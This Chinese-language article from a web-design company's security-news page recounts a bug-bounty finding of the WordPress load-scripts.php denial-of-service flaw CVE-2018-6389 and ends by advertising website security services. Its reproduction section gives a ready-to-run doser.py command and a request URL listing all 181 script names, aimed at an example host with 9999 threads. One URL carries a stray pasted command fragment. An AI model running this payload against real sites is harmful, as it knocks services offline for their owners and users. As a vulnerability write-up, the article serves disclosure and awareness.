网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

漏洞公告团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 网络安全 > 漏洞公告 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

影响3.x至4.x所有版本的WordPress程序的DoS通杀漏洞CVE-2018-6389

文章来源:重庆网络安全 发布时间:2019-12-24 09:34:14 围观次数:
分享到:

摘要:本文共享的文章涉及WordPress DoS漏洞CVE-2018-6389,该漏洞影响从3 x到4 x的所有版本的WordPress程序。 作者针对此漏洞测试并验证了目标网站,并获得了700美元的奖金,网站建设安全性越发重要。

CVE-2018-6389简介


  漏洞的重点是load-scripts.php,该文件是为WordPress管理员设计的,允许将多个JavaScript文件加载到一个请求中,但是研究人员注意到,可以在登录之前调用此函数,以允许任何人调用它, 任何人都可以允许这种调用。 通过构造特殊的有效负载,服务器可以执行181个I / O操作。 在并发请求的情况下,可以实现Dos的效果。


  漏洞测试


  在测试中,我看到一个网站是WordPress架构,它具有以下路径:

https://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core&ver=4.9.1

load-scripts.php文件将从load []接收一个参数值为'jquery-ui-core'的参数。 加载请求后,我收到了“ jQuery UI Core”响应模块的JS。


  至此,我想到了CVE-2018-6389,这是WordPress中的DoS漏洞。 尽管它只是DoS,但它也是一个流行的漏洞。 此漏洞的原因是WordPress允许用户通过load-scripts.php文件一次加载多个JS文件和CSS文件。 之后,load-scripts.php将自动加载jquery-ui-core和编辑器文件并返回文件内容。 但是,在加载JS文件的过程中,文件的数量和大小没有限制。 攻击者可以使用此功能来耗尽服务器资源,以发起拒绝服务攻击。 本文将使用VulnSpy的在线实验环境来重现和测试该漏洞。


  上面的链接似乎表明它可能是提供给用户的JS模块。 另外,load []参数是一个数组,这意味着可以为其提供多个值,以便可以在响应中获得多个JS模块。


  因为WordPress使用wp_scripts列表存储所有181个脚本文件的路径,所以目的是允许管理员或开发人员在load []参数中包含特定脚本的路径,并根据用户提供的值提高性能。  wp_scripts列表被硬编码在script-loader.php文件中。 因此,我想知道是否向服务器发出请求,并要求它响应存储的每个JS模块,以便单个请求可以使服务器执行181个输入/输出(I / O)操作! 然后尝试CVE-2018-6389。


  我尝试过,它确实存在! 服务器在2.2秒内响应了大约4MB的数据。 可以看出它对服务器性能的影响有多大。

漏洞复现


  1.在Linux终端中输入命令clonehttps://github.com/WazeHell/CVE-2018-6389.git


  2.复制测试脚本,并以目标网站https://example.com/为例,进行以下测试:

python doser.py -g 'https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999

在发送了2,000多个数据包之后,我发现服务器已经做出了显着响应。

blob.png

3.现在,我们在浏览器中访问以下链接:

https://example.com/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999

可以看出,服务器基本上处于瘫痪状态,最终将返回超时状态提醒,因此测试有效且成功。

blob.png

漏洞报告和处理


  2019.8.23漏洞初步报告


  2019.8.24供应商回复


  2019.8.27制造商奖励$ 700

可见

大型公司已开始觉醒,可以利于的漏洞软件离我们并不遥远。与我们息息相关的就是企业网站,门户网站,特别是商城网站建设安全性尤为重要。我们不能低估网站安全的重要性,您可以想象一下一个网站漏洞可以给你带来的后果。 饱尝危机的公司已开始增加其网站的安全保护,开始全面监视程序漏洞的安全性,并紧急增加应急计划和增加年度安全维护预算。

  一些公司对网站的安全性没有给予足够的重视。 为了省钱,他们购买了模板网站和虚拟主机。 这样的鸡肋网站不仅没有抗攻击能力,甚至可能不攻自破,这并没有达到节省开支的目的。 选择一家专业的网站建设公司来提供全套的专业技术和安全维护,您的网站就可以高枕无忧了。


本文由 重庆网络安全 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:WordPress DoS漏洞 CVE-2018-6389 网站建设安全 网络安全

上一篇:安全漏洞爆出:Twitter面向所有Android端用户通过移动APP和电子邮件的方式通知尽快更改密码
下一篇:国内儿童智能手表爆高危安全防护漏洞映射网站建设安全的重要性

热门资讯

鼠标向下滚动